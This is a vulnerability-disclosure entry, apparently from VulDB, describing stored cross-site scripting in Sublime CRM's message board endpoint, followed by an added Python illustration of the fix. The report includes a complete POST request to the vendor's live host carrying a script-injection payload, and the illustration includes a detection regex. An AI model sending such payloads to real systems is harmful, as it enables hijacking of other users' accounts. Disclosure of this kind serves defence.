| Title | Internet Web Solutions Sublime CRM N/A Cross Site Scripting |
|---|---|
| User | 6h4ack (UID 81245) |
| Submission | 2025-02-07 08:57 (1 year ago) |
| Moderation | 2025-02-15 16:44 (8 days later) |
| Status | Accepted |
| VulDB Entry | 295968 [Internet Web Solutions Sublime CRM up to 20250207 HTTP POST Request /crm/inicio.php msg_to cross site scripting] |
| Points | 17 |

Vulnerability description:

**SublimeCRM**, a **Customer Relationship Management (CRM) platform**, contains a **Stored Cross-Site Scripting (XSS) vulnerability** in the `/crm/inicio.php` endpoint.

The **vulnerable parameter is `message`**, which is used when a user **posts a new message on the public board**. The CRM does not properly sanitize user input, allowing authenticated attackers to inject **persistent** JavaScript payloads.

Once the malicious XSS payload is stored in a new message, **it will automatically execute for any user as soon as they log into their account**, leading to **account compromise or unauthorized actions**.

Steps to reproduce:

1. **Log in** to the SublimeCRM platform at `https://www.sublimecrm.com/crm/inicio.php`.
2. Send the following **malicious POST request** to create a new message:

```http
POST /crm/inicio.php HTTP/2
Host: www.sublimecrm.com
Cookie: crm_iws=qp9ptvgov90d2s5q6dkn43phq7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Origin: https://www.sublimecrm.com
Referer: https://www.sublimecrm.com/crm/inicio.php

pagina=1&orderby=time&orderby_dir=DESC&unique_edit_id=140&id=(Nuevo)&deleted=&msg_from=8&msg_to=0&message="><script>alert(1)</script>&time=&cliente_crm=1&details=0&edit=0&submit_element=1&delete_element=0
```

3. Submit the request.
4. Any **user who logs into the CRM will immediately trigger the stored JavaScript code**, executing it without any additional interaction.

Proposed solution:

- **Sanitize input**: Properly encode user input in the `message` parameter before storing it.
- **Escape output**: Ensure stored content is encoded properly before being rendered in the CRM interface.
- **Use Content Security Policy (CSP)**: Implement a **strict CSP** to block unauthorized script execution.

References: https://owasp.org/www-community/attacks/xss/
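As an added illustration of the proposed fix (not code from SublimeCRM or from the submitter), the Python below decodes the report's own form body, shows why a `message` value starting with `">` breaks out of an attribute when echoed verbatim, and shows output encoding neutralising it. The template shape, the CSP policy and the triage pattern are assumptions, not the application's real code.

```python
import html
import re
from urllib.parse import parse_qs

# Form body copied from Step 2 of the report, used here as sample input.
REPORTED_BODY = (
    "pagina=1&orderby=time&orderby_dir=DESC&unique_edit_id=140&id=(Nuevo)&deleted="
    "&msg_from=8&msg_to=0&message=\"><script>alert(1)</script>&time=&cliente_crm=1"
    "&details=0&edit=0&submit_element=1&delete_element=0"
)


def parse_post_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_message_vulnerable(message: str) -> str:
    """Hypothetical board template that echoes the stored value verbatim.
    Inside value="...", a leading '">' closes the input tag, so the rest of the
    stored string is parsed by the browser as live markup."""
    return f'<input name="message" value="{message}"><div class="msg">{message}</div>'


def render_message_safe(message: str) -> str:
    """Same template with the value HTML-encoded at output time.
    quote=True also encodes the double quote, which is what keeps the
    attribute context from being closed early."""
    safe = html.escape(message, quote=True)
    return f'<input name="message" value="{safe}"><div class="msg">{safe}</div>'


def csp_header() -> tuple:
    """A hypothetical strict policy: no inline script, scripts only from the app's own origin."""
    return ("Content-Security-Policy",
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'")


def flag_stored_message(message: str) -> bool:
    """Coarse triage check for messages already in the database after deploying the fix;
    a hit means the row deserves manual review, not that it is certainly malicious."""
    return re.search(r"<\s*script|javascript:|\bon\w+\s*=", message, re.I) is not None


if __name__ == "__main__":
    msg = parse_post_body(REPORTED_BODY)["message"]
    print("vulnerable:", render_message_vulnerable(msg))
    print("safe:      ", render_message_safe(msg))
    print("flagged:   ", flag_stored_message(msg))
```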